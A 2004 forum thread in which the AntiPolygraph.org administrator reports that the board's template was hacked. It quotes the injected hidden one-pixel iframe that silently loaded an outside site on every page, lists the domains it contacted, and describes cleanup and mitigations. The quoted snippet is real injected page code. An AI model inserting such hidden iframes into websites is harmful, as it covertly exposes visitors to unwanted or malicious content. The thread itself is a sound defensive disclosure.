Normal Topic AntiPolygraph.org Message Board Hacked (Read 4482 times)
Paste Member Name in Quick Reply Box Administrator
Administrator
*****
Offline



Posts: 343
Joined: Sep 28th, 2000
AntiPolygraph.org Message Board Hacked
Jun 6th, 2004 at 3:47am
Mark & QuoteQuote Print Post  
On 2 June 2004 at 11:28 hrs Pacific Daylight Time, the AntiPolygraph.org message board's template file was modified without authorization by an unknown person. The following text was inserted into the file:

<div style="visibility: hidden; position: absolute; left: 1; top: 1"><iframe src="http://re6.net/?s=1" frameborder=0 vspace=0 hspace=0 width=1 height=1 marginwidth=0 marginheight=0 scrolling=no></iframe></div>

This code would cause a number of outside URLs to be contacted each time any page on the message board was loaded. Its intended purpose seems to be to deliver pop-up advertisements. Among the URLs that would automatically be contacted are:

http://re6.net/?s=1
http://sowor.ru
http://wall.sowor.ru/?tfnop=mgetx

The added code was removed on 5 June 2004 at 17:07 hrs PDT. We are researching this incident and taking measures to prevent a re-occurrence.
« Last Edit: Jun 6th, 2004 at 4:13am by Administrator »  

AntiPolygraph.org Administrator
Back to top
IP Logged
 
Paste Member Name in Quick Reply Box Administrator
Administrator
*****
Offline



Posts: 343
Joined: Sep 28th, 2000
Re: AntiPolygraph.org Message Board Hacked
Reply #1 - Jun 6th, 2004 at 4:17am
Mark & QuoteQuote Print Post  
Similar hacking incidents have been reported on other websites. See:

http://forums.hostreflex.com/showthread.php?p=1029#post1029

http://forums.eqdkp.com/index.php?showtopic=885
  

AntiPolygraph.org Administrator
Back to top
IP Logged
 
Paste Member Name in Quick Reply Box macagent
New User
*
Offline



Posts: 1
Joined: Sep 23rd, 2004
Re: AntiPolygraph.org Message Board Hacked
Reply #2 - Sep 23rd, 2004 at 5:02am
Mark & QuoteQuote Print Post  
I have seen this exact same thing happen to my site. Did you ever find out what happened and how to prevent it?
  
Back to top
 
IP Logged
 
Paste Member Name in Quick Reply Box Administrator
Administrator
*****
Offline



Posts: 343
Joined: Sep 28th, 2000
Re: AntiPolygraph.org Message Board Hacked
Reply #3 - Sep 23rd, 2004 at 9:05am
Mark & QuoteQuote Print Post  
No, it is not clear how the template file was modified, though it may have been through a security flaw involving Macromedia Flash files. We disabled flash. In addition, if you are running YaBB, you can upgrade to version 1.3.2, which includes security fixes.
  

AntiPolygraph.org Administrator
Back to top
IP Logged
 
AntiPolygraph.org Message Board Hacked

Please type the characters that appear in the image. The characters must be typed in the same order, and they are case-sensitive.
Open Preview Preview

You can resize the textbox by dragging the right or bottom border.
Insert Hyperlink Insert FTP Link Insert Image Insert E-mail Insert Media Insert Table Insert Table Row Insert Table Column Insert Horizontal Rule Insert Teletype Insert Code Insert Quote Edited Superscript Subscript Insert List /me - my name Insert Marquee Insert Timestamp No Parse
Bold Italicized Underline Insert Strikethrough Highlight
                       
Change Text Color
Insert Preformatted Text Left Align Centered Right Align
resize_wb
resize_hb







Max 200000 characters. Remaining characters:
Text size: pt
More Smilies
View All Smilies
Collapse additional features Collapse/Expand additional features Smiley Wink Cheesy Grin Angry Sad Shocked Cool Huh Roll Eyes Tongue Embarrassed Lips Sealed Undecided Kiss Cry
Attachments More Attachments Allowed file types: txt doc docx ics psd pdf bmp jpe jpg jpeg gif png swf zip rar tar gz 7z odt ods mp3 mp4 wav avi mov 3gp html maff pgp gpg
Maximum Attachment size: 500000 KB
Attachment 1:
X